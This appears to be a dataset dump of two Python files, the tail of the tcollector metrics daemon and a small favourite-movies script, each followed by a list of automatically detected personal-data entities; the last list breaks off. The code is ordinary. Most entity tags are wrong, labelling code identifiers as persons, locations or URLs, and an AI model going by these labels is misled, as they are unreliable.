# reader thread since there's nothing else for us to do here
if options.stdin:
register_collector(StdinCollector())
stdin_loop(options, modules, sender, tags)
else:
sys.stdin.close()
main_loop(options, modules, sender, tags)
# We're exiting, make sure we don't leave any collector behind.
for col in all_living_collectors():
col.shutdown()
LOG.debug('Shutting down -- joining the reader thread.')
reader.join()
LOG.debug('Shutting down -- joining the sender thread.')
sender.join()
def stdin_loop(options, modules, sender, tags):
"""The main loop of the program that runs when we are in stdin mode."""
global ALIVE
next_heartbeat = int(time.time() + 600)
while ALIVE:
time.sleep(15)
reload_changed_config_modules(modules, options, sender, tags)
now = int(time.time())
if now >= next_heartbeat:
LOG.info('Heartbeat (%d collectors running)'
% sum(1 for col in all_living_collectors()))
next_heartbeat = now + 600
def main_loop(options, modules, sender, tags):
"""The main loop of the program that runs when we're not in stdin mode."""
next_heartbeat = int(time.time() + 600)
while ALIVE:
populate_collectors(options.cdir)
reload_changed_config_modules(modules, options, sender, tags)
reap_children()
check_children(options)
spawn_children()
time.sleep(15)
now = int(time.time())
if now >= next_heartbeat:
LOG.info('Heartbeat (%d collectors running)'
% sum(1 for col in all_living_collectors()))
next_heartbeat = now + 600
def list_config_modules(etcdir):
"""Returns an iterator that yields the name of all the config modules."""
if not os.path.isdir(etcdir):
return iter(()) # Empty iterator.
return (name for name in os.listdir(etcdir)
if (name.endswith('.py')
and os.path.isfile(os.path.join(etcdir, name))))
def load_etc_dir(options, tags):
"""Loads any Python module from tcollector's own 'etc' directory.
Returns: A dict of path -> (module, timestamp).
"""
etcdir = os.path.join(options.cdir, 'etc')
sys.path.append(etcdir) # So we can import modules from the etc dir.
modules = {} # path -> (module, timestamp)
for name in list_config_modules(etcdir):
path = os.path.join(etcdir, name)
module = load_config_module(name, options, tags)
modules[path] = (module, os.path.getmtime(path))
return modules
def load_config_module(name, options, tags):
"""Imports the config module of the given name
The 'name' argument can be a string, in which case the module will be
loaded by name, or it can be a module object, in which case the module
will get reloaded.
If the module has an 'onload' function, calls it.
Returns: the reference to the module loaded.
"""
if isinstance(name, str):
LOG.info('Loading %s', name)
d = {}
# Strip the trailing .py
module = __import__(name[:-3], d, d)
else:
module = reload(name)
onload = module.__dict__.get('onload')
if callable(onload):
try:
onload(options, tags)
except:
LOG.fatal('Exception while loading %s', name)
raise
return module
def reload_changed_config_modules(modules, options, sender, tags):
"""Reloads any changed modules from the 'etc' directory.
Args:
cdir: The path to the 'collectors' directory.
modules: A dict of path -> (module, timestamp).
Returns: whether or not anything has changed.
"""
etcdir = os.path.join(options.cdir, 'etc')
current_modules = set(list_config_modules(etcdir))
current_paths = set(os.path.join(etcdir, name)
for name in current_modules)
changed = False
# Reload any module that has changed.
for path, (module, timestamp) in modules.iteritems():
if path not in current_paths: # Module was removed.
continue
mtime = os.path.getmtime(path)
if mtime > timestamp:
LOG.info('Reloading %s, file has changed', path)
module = load_config_module(module, options, tags)
modules[path] = (module, mtime)
changed = True
# Remove any module that has been removed.
for path in set(modules).difference(current_paths):
LOG.info('%s has been removed, tcollector should be restarted', path)
del modules[path]
changed = True
# Check for any modules that may have been added.
for name in current_modules:
path = os.path.join(etcdir, name)
if path not in modules:
module = load_config_module(name, options, tags)
modules[path] = (module, os.path.getmtime(path))
changed = True
return changed
def write_pid(pidfile):
"""Write our pid to a pidfile."""
f = open(pidfile, "w")
try:
f.write(str(os.getpid()))
finally:
f.close()
def all_collectors():
"""Generator to return all collectors."""
return COLLECTORS.itervalues()
# collectors that are not marked dead
def all_valid_collectors():
"""Generator to return all defined collectors that haven't been marked
dead in the past hour, allowing temporarily broken collectors a
chance at redemption."""
now = int(time.time())
for col in all_collectors():
if not col.dead or (now - col.lastspawn > 3600):
yield col
# collectors that have a process attached (currenty alive)
def all_living_collectors():
"""Generator to return all defined collectors that have
an active process."""
for col in all_collectors():
if col.proc is not None:
yield col
def shutdown_signal(signum, frame):
"""Called when we get a signal and need to terminate."""
LOG.warning("shutting down, got signal %d", signum)
shutdown()
def kill(proc, signum=signal.SIGTERM):
os.killpg(proc.pid, signum)
def shutdown():
"""Called by atexit and when we receive a signal, this ensures we properly
terminate any outstanding children."""
global ALIVE
# prevent repeated calls
if not ALIVE:
return
# notify threads of program termination
ALIVE = False
LOG.info('shutting down children')
# tell everyone to die
for col in all_living_collectors():
col.shutdown()
LOG.info('exiting')
sys.exit(1)
def reap_children():
"""When a child process dies, we have to determine why it died and whether
or not we need to restart it. This method manages that logic."""
for col in all_living_collectors():
now = int(time.time())
# FIXME: this is not robust. the asyncproc module joins on the
# reader threads when you wait if that process has died. this can cause
# slow dying processes to hold up the main loop. good for now though.
status = col.proc.poll()
if status is None:
continue
col.proc = None
# behavior based on status. a code 0 is normal termination, code 13
# is used to indicate that we don't want to restart this collector.
# any other status code is an error and is logged.
if status == 13:
LOG.info('removing %s from the list of collectors (by request)',
col.name)
col.dead = True
elif status != 0:
LOG.warning('collector %s terminated after %d seconds with '
'status code %d, marking dead',
col.name, now - col.lastspawn, status)
col.dead = True
else:
register_collector(Collector(col.name, col.interval, col.filename,
col.mtime, col.lastspawn))
def check_children(options):
"""When a child process hasn't received a datapoint in a while,
assume it's died in some fashion and restart it."""
for col in all_living_collectors():
now = int(time.time())
if col.last_datapoint < (now - options.allowed_inactivity_time):
# It's too old, kill it
LOG.warning('Terminating collector %s after %d seconds of inactivity',
col.name, now - col.last_datapoint)
col.shutdown()
if not options.remove_inactive_collectors:
register_collector(Collector(col.name, col.interval, col.filename,
col.mtime, col.lastspawn))
def set_nonblocking(fd):
"""Sets the given file descriptor to non-blocking mode."""
fl = fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, fl)
def spawn_collector(col):
"""Takes a Collector object and creates a process for it."""
LOG.info('%s (interval=%d) needs to be spawned', col.name, col.interval)
# FIXME: do custom integration of Python scripts into memory/threads
# if re.search('\.py$', col.name) is not None:
# ... load the py module directly instead of using a subprocess ...
try:
col.proc = subprocess.Popen(col.filename, stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
preexec_fn=os.setsid)
except OSError, e:
LOG.error('Failed to spawn collector %s: %s' % (col.filename, e))
return
# The following line needs to move below this line because it is used in
# other logic and it makes no sense to update the last spawn time if the
# collector didn't actually start.
col.lastspawn = int(time.time())
set_nonblocking(col.proc.stdout.fileno())
set_nonblocking(col.proc.stderr.fileno())
if col.proc.pid > 0:
col.dead = False
LOG.info('spawned %s (pid=%d)', col.name, col.proc.pid)
return
# FIXME: handle errors better
LOG.error('failed to spawn collector: %s', col.filename)
def spawn_children():
"""Iterates over our defined collectors and performs the logic to
determine if we need to spawn, kill, or otherwise take some
action on them."""
if not ALIVE:
return
for col in all_valid_collectors():
now = int(time.time())
if col.interval == 0:
if col.proc is None:
spawn_collector(col)
elif col.interval <= now - col.lastspawn:
if col.proc is None:
spawn_collector(col)
continue
# I'm not very satisfied with this path. It seems fragile and
# overly complex, maybe we should just reply on the asyncproc
# terminate method, but that would make the main tcollector
# block until it dies... :|
if col.nextkill > now:
continue
if col.killstate == 0:
LOG.warning('warning: %s (interval=%d, pid=%d) overstayed '
'its welcome, SIGTERM sent',
col.name, col.interval, col.proc.pid)
kill(col.proc)
col.nextkill = now + 5
col.killstate = 1
elif col.killstate == 1:
LOG.error('error: %s (interval=%d, pid=%d) still not dead, '
'SIGKILL sent',
col.name, col.interval, col.proc.pid)
kill(col.proc, signal.SIGKILL)
col.nextkill = now + 5
col.killstate = 2
else:
LOG.error('error: %s (interval=%d, pid=%d) needs manual '
'intervention to kill it',
col.name, col.interval, col.proc.pid)
col.nextkill = now + 300
def populate_collectors(coldir):
"""Maintains our internal list of valid collectors. This walks the
collector directory and looks for files. In subsequent calls, this
also looks for changes to the files -- new, removed, or updated files,
and takes the right action to bring the state of our running processes
in line with the filesystem."""
global GENERATION
GENERATION += 1
# get numerics from scriptdir, we're only setup to handle numeric paths
# which define intervals for our monitoring scripts
for interval in os.listdir(coldir):
if not interval.isdigit():
continue
interval = int(interval)
for colname in os.listdir('%s/%d' % (coldir, interval)):
if colname.startswith('.'):
continue
filename = '%s/%d/%s' % (coldir, interval, colname)
if os.path.isfile(filename) and os.access(filename, os.X_OK):
mtime = os.path.getmtime(filename)
# if this collector is already 'known', then check if it's
# been updated (new mtime) so we can kill off the old one
# (but only if it's interval 0, else we'll just get
# it next time it runs)
if colname in COLLECTORS:
col = COLLECTORS[colname]
# if we get a dupe, then ignore the one we're trying to
# add now. there is probably a more robust way of doing
# this...
if col.interval != interval:
LOG.error('two collectors with the same name %s and '
'different intervals %d and %d',
colname, interval, col.interval)
continue
# we have to increase the generation or we will kill
# this script again
col.generation = GENERATION
if col.mtime < mtime:
LOG.info('%s has been updated on disk', col.name)
col.mtime = mtime
if not col.interval:
col.shutdown()
LOG.info('Respawning %s', col.name)
register_collector(Collector(colname, interval,
filename, mtime))
else:
register_collector(Collector(colname, interval, filename,
mtime))
# now iterate over everybody and look for old generations
to_delete = []
for col in all_collectors():
if col.generation < GENERATION:
LOG.info('collector %s removed from the filesystem, forgetting',
col.name)
col.shutdown()
to_delete.append(col.name)
for name in to_delete:
del COLLECTORS[name]
if __name__ == '__main__':
sys.exit(main(sys.argv))
| 58,560 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Mark Smith dummy@email.com'], ['DATE_TIME', 'September 2020'], ['PERSON', 'Args'], ['LOCATION', 'del self.values[key]'], ['LOCATION', 'self.datalines.append(line.rstrip'], ['PERSON', 'Args'], ['DATE_TIME', 'this many seconds'], ['PERSON', 'Parses'], ['DATE_TIME', 'every 10 minutes'], ['DATE_TIME', 'the beginning/end'], ['DATE_TIME', 'Fall'], ['PERSON', 'dryrun'], ['PERSON', 'Args'], ['PERSON', 'dryrun'], ['DATE_TIME', 'seconds'], ['PERSON', 'hostport'], ['LOCATION', 'self.host'], ['PERSON', "LOG.info('Blacklisting"], ['LOCATION', 'self.host'], ['DATE_TIME', '5\n seconds'], ['DATE_TIME', '5 more seconds'], ['PERSON', 'self.maintain_conn'], ['PERSON', 'SenderThread'], ['PERSON', 'SenderThread'], ['DATE_TIME', 'less than a minute ago'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['PERSON', 'LOG.debug("Sending'], ['URL', 'LOG.de'], ['LOCATION', 'self.host'], ['LOCATION', 'self.host'], ['URL', 'LOG.de'], ['URL', 'urllib2.HT'], ['URL', 'LOG.er'], ['PERSON', 'LOG.addHandler(ch'], ['LOCATION', 'parse_cmdline(argv'], ['PERSON', 'Parses'], ['PERSON', "metavar='HOST"], ['PERSON', "metavar='FILE"], ['DATE_TIME', 'seconds'], ['LOCATION', "metavar='EVICTINTERVAL"], ['DATE_TIME', 'seconds'], ['LOCATION', "dest='allowed_inactivity_time"], ['DATE_TIME', "help='Remove"], ['PERSON', 'max'], ['PERSON', "type='str"], ['DATE_TIME', 'seconds'], ['PERSON', "help='The"], ['PERSON', "dest='http_password"], ['DATE_TIME', "at least 0 seconds'"], ['DATE_TIME', "at least 0 seconds'"], ['PERSON', 'mydir = os.path.dirname(collector_dir'], ['PERSON', 'libdir = os.path.join(mydir'], ['PERSON', "LOG.fatal('No"], ['PERSON', 'options.cdir'], ['LOCATION', 'options.http_username'], ['PERSON', 'all_living_collectors'], ['PERSON', 'time.sleep(15'], ['PERSON', 'all_living_collectors'], ['PERSON', 'list_config_modules(etcdir'], ['PERSON', 'etcdir = os.path.join(options.cdir'], ['PERSON', 'list_config_modules(etcdir'], ['PERSON', 'Args'], ['PERSON', 'etcdir = os.path.join(options.cdir'], ['PERSON', 'mtime'], ['PERSON', 'mtime'], ['PERSON', 'mtime'], ['PERSON', 'del modules[path'], ['DATE_TIME', 'the past hour'], ['PERSON', 'currenty'], ['DATE_TIME', 'seconds'], ['DATE_TIME', 'seconds'], ['LOCATION', 'fcntl'], ['LOCATION', 'fcntl'], ['LOCATION', "os.listdir('%s/%d"], ['PERSON', 'X_OK'], ['PERSON', 'mtime'], ['PERSON', 'mtime'], ['LOCATION', 'del COLLECTORS[name]'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'tcollector.py'], ['URL', 'email.com'], ['URL', 'logging.ge'], ['URL', 'collector.na'], ['URL', 'collector.na'], ['URL', 'col.pro'], ['URL', 'LOG.er'], ['URL', 'col.na'], ['URL', 'col.pro'], ['URL', 'col.sh'], ['URL', 'collector.na'], ['URL', 'LOG.er'], ['URL', 'self.na'], ['URL', 'self.int'], ['URL', 'self.fi'], ['URL', 'self.la'], ['URL', 'self.pro'], ['URL', 'self.ne'], ['URL', 'self.ki'], ['URL', 'self.de'], ['URL', 'self.mt'], ['URL', 'self.ge'], ['URL', 'self.va'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'self.la'], ['URL', 'self.proc.stderr.re'], ['URL', 'LOG.de'], ['URL', 'self.na'], ['URL', 'self.na'], ['URL', 'self.proc.stdout.re'], ['URL', 'LOG.de'], ['URL', 'self.na'], ['URL', 'self.buffer.fi'], ['URL', 'self.la'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'LOG.in'], ['URL', 'self.pro'], ['URL', 'self.na'], ['URL', 'time.sl'], ['URL', 'self.pro'], ['URL', 'signal.SI'], ['URL', 'self.pro'], ['URL', 'self.values.ke'], ['URL', 'self.va'], ['URL', 'self.va'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'sys.stdin.re'], ['URL', 'line.rs'], ['URL', 'threading.Th'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.li'], ['URL', 'self.li'], ['URL', 'self.de'], ['URL', 'LOG.de'], ['URL', 'col.co'], ['URL', 'self.pro'], ['URL', 'self.de'], ['URL', 'time.sl'], ['URL', 'self.li'], ['URL', 'col.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 're.ma'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'parsed.gr'], ['URL', 'self.de'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'LOG.er'], ['URL', 'col.va'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'LOG.er'], ['URL', 'col.va'], ['URL', 'col.na'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'self.de'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'self.de'], ['URL', 'col.va'], ['URL', 'col.li'], ['URL', 'self.readerq.np'], ['URL', 'col.va'], ['URL', 'self.li'], ['URL', 'col.va'], ['URL', 'col.va'], ['URL', 'col.li'], ['URL', 'self.readerq.np'], ['URL', 'self.li'], ['URL', 'threading.Th'], ['URL', 'self.re'], ['URL', 'tags.it'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'random.sh'], ['URL', 'self.cu'], ['URL', 'self.la'], ['URL', 'self.re'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'LOG.in'], ['URL', 'random.sh'], ['URL', 'hosts.cl'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'LOG.in'], ['URL', 'LOG.in'], ['URL', 'hosts.ad'], ['URL', 'self.ma'], ['URL', 'self.reader.readerq.ge'], ['URL', 'self.se'], ['URL', 'time.sl'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.reader.readerq.ge'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'time.sl'], ['URL', 'self.ht'], ['URL', 'self.la'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.tsd.cl'], ['URL', 'socket.er'], ['URL', 'LOG.de'], ['URL', 'self.tsd.se'], ['URL', 'socket.er'], ['URL', 'self.tsd.re'], ['URL', 'socket.er'], ['URL', 'self.se'], ['URL', 'reader.li'], ['URL', 'self.reader.li'], ['URL', 'reader.li'], ['URL', 'self.reader.li'], ['URL', 'collector.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'collector.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'collector.li'], ['URL', 'col.na'], ['URL', 'col.li'], ['URL', 'self.se'], ['URL', 'self.la'], ['URL', 'self.ht'], ['URL', 'self.ve'], ['URL', 'LOG.de'], ['URL', 'time.sl'], ['URL', 'socket.ge'], ['URL', 'socket.AF'], ['URL', 'socket.SO'], ['URL', 'socket.ga'], ['URL', 'LOG.de'], ['URL', 'socket.so'], ['URL', 'self.tsd.se'], ['URL', 'self.tsd.co'], ['URL', 'LOG.de'], ['URL', 'socket.er'], ['URL', 'self.tsd.cl'], ['URL', 'LOG.er'], ['URL', 'self.se'], ['URL', 'self.ht'], ['URL', 'self.se'], ['URL', 'logging.DE'], ['URL', 'self.se'], ['URL', 'self.ad'], ['URL', 'LOG.de'], ['URL', 'self.ad'], ['URL', 'self.se'], ['URL', 'LOG.de'], ['URL', 'self.tsd.se'], ['URL', 'self.se'], ['URL', 'socket.er'], ['URL', 'LOG.er'], ['URL', 'self.tsd.cl'], ['URL', 'socket.er'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'tags.st'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'tags.it'], ['URL', 'LOG.er'], ['URL', 'urllib2.Re'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'req.ad'], ['URL', 'self.ht'], ['URL', 'self.ht'], ['URL', 'req.ad'], ['URL', 'response.ge'], ['URL', 'self.se'], ['URL', 'response.ge'], ['URL', 'LOG.se'], ['URL', 'logging.IN'], ['URL', 'logging.St'], ['URL', 'sys.st'], ['URL', 'ch.se'], ['URL', 'logging.Fo'], ['URL', 'LOG.ad'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'sys.ar'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'options.de'], ['URL', 'parser.er'], ['URL', 'options.de'], ['URL', 'parser.er'], ['URL', 'options.re'], ['URL', 'parser.er'], ['URL', 'options.ma'], ['URL', 'options.ba'], ['URL', 'options.ba'], ['URL', 'os.fo'], ['URL', 'os.ch'], ['URL', 'os.se'], ['URL', 'os.fo'], ['URL', 'os.de'], ['URL', 'os.de'], ['URL', 'stdin.fi'], ['URL', 'stdout.fi'], ['URL', 'stdout.fi'], ['URL', 'stdin.cl'], ['URL', 'stdout.cl'], ['URL', 'os.cl'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'os.path.is'], ['URL', 'os.environ.ge'], ['URL', 'LOG.de'], ['URL', 'options.ma'], ['URL', 'options.ba'], ['URL', 'options.ve'], ['URL', 'LOG.se'], ['URL', 'logging.DE'], ['URL', 're.ma'], ['URL', 'options.st'], ['URL', 'socket.ge'], ['URL', 'options.cd'], ['URL', 'os.path.re'], ['URL', 'options.cd'], ['URL', 'os.path.is'], ['URL', 'options.cd'], ['URL', 'options.cd'], ['URL', 'options.cd'], ['URL', 'atexit.re'], ['URL', 'signal.SI'], ['URL', 'signal.SI'], ['URL', 'signal.si'], ['URL', 'options.de'], ['URL', 'reader.st'], ['URL', 'options.no'], ['URL', 'options.re'], ['URL', 'options.ht'], ['URL', 'options.ht'], ['URL', 'options.ht'], ['URL', 'options.ma'], ['URL', 'sender.st'], ['URL', 'LOG.in'], ['URL', 'options.st'], ['URL', 'sys.stdin.cl'], ['URL', 'col.sh'], ['URL', 'LOG.de'], ['URL', 'reader.jo'], ['URL', 'LOG.de'], ['URL', 'sender.jo'], ['URL', 'time.sl'], ['URL', 'LOG.in'], ['URL', 'options.cd'], ['URL', 'time.sl'], ['URL', 'LOG.in'], ['URL', 'os.path.is'], ['URL', 'os.li'], ['URL', 'os.path.is'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'options.cd'], ['URL', 'sys.pa'], ['URL', 'os.path.jo'], ['URL', 'os.path.ge'], ['URL', 'LOG.in'], ['URL', 'os.path.jo'], ['URL', 'options.cd'], ['URL', 'os.path.jo'], ['URL', 'modules.it'], ['URL', 'os.path.ge'], ['URL', 'LOG.in'], ['URL', 'LOG.in'], ['URL', 'os.path.jo'], ['URL', 'os.path.ge'], ['URL', 'os.ge'], ['URL', 'f.cl'], ['URL', 'COLLECTORS.it'], ['URL', 'col.de'], ['URL', 'col.la'], ['URL', 'col.pro'], ['URL', 'signal.SI'], ['URL', 'os.ki'], ['URL', 'LOG.in'], ['URL', 'col.sh'], ['URL', 'LOG.in'], ['URL', 'col.pro'], ['URL', 'col.pro'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.de'], ['URL', 'col.na'], ['URL', 'col.la'], ['URL', 'col.de'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.fi'], ['URL', 'col.mt'], ['URL', 'col.la'], ['URL', 'col.la'], ['URL', 'options.al'], ['URL', 'col.na'], ['URL', 'col.la'], ['URL', 'col.sh'], ['URL', 'options.re'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.fi'], ['URL', 'col.mt'], ['URL', 'col.la'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 're.se'], ['URL', 'col.na'], ['URL', 'col.pro'], ['URL', 'col.fi'], ['URL', 'os.se'], ['URL', 'LOG.er'], ['URL', 'col.fi'], ['URL', 'col.la'], ['URL', 'col.proc.stdout.fi'], ['URL', 'col.proc.stderr.fi'], ['URL', 'col.pro'], ['URL', 'col.de'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.pro'], ['URL', 'LOG.er'], ['URL', 'col.fi'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.int'], ['URL', 'col.la'], ['URL', 'col.pro'], ['URL', 'col.ne'], ['URL', 'col.ki'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.pro'], ['URL', 'col.ne'], ['URL', 'col.ki'], ['URL', 'col.ki'], ['URL', 'LOG.er'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.pro'], ['URL', 'signal.SI'], ['URL', 'col.ne'], ['URL', 'col.ki'], ['URL', 'LOG.er'], ['URL', 'col.na'], ['URL', 'col.int'], ['URL', 'col.pro'], ['URL', 'col.ne'], ['URL', 'os.li'], ['URL', 'interval.is'], ['URL', 'os.li'], ['URL', 'colname.st'], ['URL', 'os.path.is'], ['URL', 'os.ac'], ['URL', 'os.path.ge'], ['URL', 'col.int'], ['URL', 'LOG.er'], ['URL', 'col.int'], ['URL', 'col.ge'], ['URL', 'col.mt'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.mt'], ['URL', 'col.int'], ['URL', 'col.sh'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.ge'], ['URL', 'LOG.in'], ['URL', 'col.na'], ['URL', 'col.sh'], ['URL', 'col.na'], ['URL', 'sys.ar']] |
15 | import media
import fav_movies_web
# Instances of my favorite movies:
# Deadpool movie: movie title, sotryline, poster image and movie trailer
deadpool = media.Movie("Deadpool",
""" Wade Wilson (Ryan Reynolds) is a former Special Forces
operative who now works as a mercenary. His world comes
crashing down when evil scientist Ajax (Ed Skrein)
tortures, disfigures and transforms him into Deadpool.
The rogue experiment leaves Deadpool with accelerated
healing powers and a twisted sense of humor. With help
from mutant allies Colossus and Negasonic Teenage
Warhead (Brianna Hildebrand), Deadpool uses his new
skills to hunt down the man who nearly destroyed
his life""",
"https://www.flickeringmyth.com/wp-content/uploads/2016/01/Deadpool-poster-1.jpg", # NOQA
"https://www.youtube.com/watch?v=Xithigfg7dA"
) # NOQA
# Focus movie: movie title, sotryline, poster image and movie trailer
focus = media.Movie("Focus",
"""Nicky (Will Smith), a veteran con artist, takes a
novice named Jess(Margot Robbie) under his wing. While
Nicky teaches Jess the tricks of the trade, the pair
become romantically involved; but, when Jess gets
uncomfortably close, Nicky ends their relationship.""",
"http://static.rogerebert.PI:KEY.jpg", # NOQA
"https://www.youtube.com/watch?v=MxCRgtdAuBo"
) # NOQA
# Mechanic: Resurrection movie: movie title, sotryline, poster image and
# movie trailer
mechanic = media.Movie("Mechanic: Resurrection",
"""Living under cover in Brazil, master assassin Arthur
Bishop(Jason Statham) springs back into action after an
old enemySam Hazeldine) kidnaps the woman (Jessica Alba)
he loves. To saveher life, Bishop must kill an
imprisoned African warlord, a humantrafficker (Toby
Eddington) and an arms dealer (Tommy Lee Jones),all
while making the deaths look like accidents. When things
don't goexactly as planned, Bishop turns the tables on
the people who forcedhim out of retirement.""",
"https://images-na.ssl-images-amazon.com/images/M/MV5BMjYwODExNzUwMV5BMl5BanBnXkFtZTgwNTgwNjUyOTE@._V1_UY1200_CR90,0,630,1200_AL_.jpg", # NOQA
"https://www.youtube.com/watch?v=G-P3f_wDXvs"
) # NOQA
# Enemy movie: movie title, sotryline, poster image and movie trailer
enemy = media.Movie("Enemy",
"""A mild-mannered college professor (Jake Gyllenhaal)
discovers a look-alike actor and delves into the other
man's private affairs.""",
"http://www.impawards.com/intl/misc/2014/posters/enemy.jpg", # NOQA
"https://www.youtube.com/watch?v=FJuaAWrgoUY"
) # NOQA
# Wonder Woman movie: movie title, sotryline, poster image and movie trailer
wonder_woman = media.Movie("Wonder Woman",
"""Before she was Wonder Woman (Gal Gadot), she was
Diana, princess ofthe Amazons, trained to be an
unconquerable warrior. Raised on asheltered island
paradise, Diana meets an American pilot (Chris Pine)
who tells her about the massive conflict that's
raging in the outsideworld. Convinced that she can
stop the threat, Diana leaves herhome for the first
time. Fighting alongside men in a war to end
allwars, she finally discovers her full powers and
true destiny""",
"http://cdn2-www.comingsoon.net/assets/uploads/gallery/wonder-woman/wwposter5.jpg", # NOQA
"https://www.youtube.com/watch?v=1Q8fG0TtVAY"
) # NOQA
# Ghost in the Shell movie: movie title, sotryline, poster image and movie
# trailer
ghost_in_the_shell = media.Movie("Ghost in the Shell",
"""In the near future, Major is the first of
herkind: a human who iscyber-enhanced to be a
perfect soldier devoted to stopping theworld's
most dangerous criminals. When terrorism
reaches a newlevel that includes the ability
to hack into people's minds and control them,
Major is uniquely qualified to stop it. As
sheprepares to face a new enemy, Major
discovers that her life was stoleninstead of
saved. Now, she will stop at nothing to
recover her pastwhile punishing those who did
this to her.""",
"http://cdn2-www.comingsoon.net/assets/uploads/gallery/ghost-in-the-shell/ghostinshellposter.jpg", # NOQA
"https://www.youtube.com/watch?v=G4VmJcZR0Yg"
) # NOQA
# All instances grouped together in a list
# The list is the sit of the movies that will be passed to the media file
movies = [
deadpool,
focus,
mechanic,
enemy, wonder_woman,
ghost_in_the_shell
]
# Open the HTML file in a webbrowser via the fav_movies_web.py
fav_movies_web.open_movies_page(movies) # the array/list (argument)
| 4,766 | [['PERSON', 'sotryline'], ['PERSON', 'Wade Wilson'], ['PERSON', 'Ryan Reynolds'], ['PERSON', 'Ajax'], ['PERSON', 'Ed Skrein'], ['PERSON', 'Deadpool'], ['PERSON', 'Brianna Hildebrand'], ['PERSON', 'Deadpool'], ['PERSON', 'sotryline'], ['PERSON', 'Nicky'], ['PERSON', 'Will Smith'], ['PERSON', 'Jess(Margot Robbie'], ['PERSON', 'Nicky'], ['PERSON', 'Jess'], ['PERSON', 'Jess'], ['PERSON', 'Nicky'], ['PERSON', 'sotryline'], ['LOCATION', 'Brazil'], ['PERSON', 'Arthur\n Bishop(Jason Statham'], ['PERSON', 'Hazeldine'], ['PERSON', 'Jessica Alba'], ['NRP', 'African'], ['PERSON', 'Tommy Lee Jones),all'], ['PERSON', 'sotryline'], ['PERSON', 'Movie("Enemy'], ['PERSON', 'Jake Gyllenhaal'], ['PERSON', 'sotryline'], ['PERSON', 'Gal Gadot'], ['PERSON', 'Diana'], ['PERSON', 'Diana'], ['NRP', 'American'], ['PERSON', 'Chris Pine'], ['PERSON', 'Diana'], ['PERSON', 'herhome'], ['PERSON', 'sotryline'], ['URL', 'https://www.flickeringmyth.com/wp-content/uploads/2016/01/Deadpool-poster-1.jpg",'], ['URL', 'https://www.youtube.com/watch?v=Xithigfg7dA"'], ['URL', 'http://static.ro'], ['URL', 'https://www.youtube.com/watch?v=MxCRgtdAuBo"'], ['URL', 'https://images-na.ssl-images-amazon.com/images/M/MV5BMjYwODExNzUwMV5BMl5BanBnXkFtZTgwNTgwNjUyOTE@._V1_UY1200_CR90,0,630,1200_AL_.jpg",'], ['URL', 'https://www.youtube.com/watch?v=G-P3f_wDXvs"'], ['URL', 'http://www.impawards.com/intl/misc/2014/posters/enemy.jpg",'], ['URL', 'https://www.youtube.com/watch?v=FJuaAWrgoUY"'], ['URL', 'http://cdn2-www.comingsoon.net/assets/uploads/gallery/wonder-woman/wwposter5.jpg",'], ['URL', 'https://www.youtube.com/watch?v=1Q8fG0TtVAY"'], ['URL', 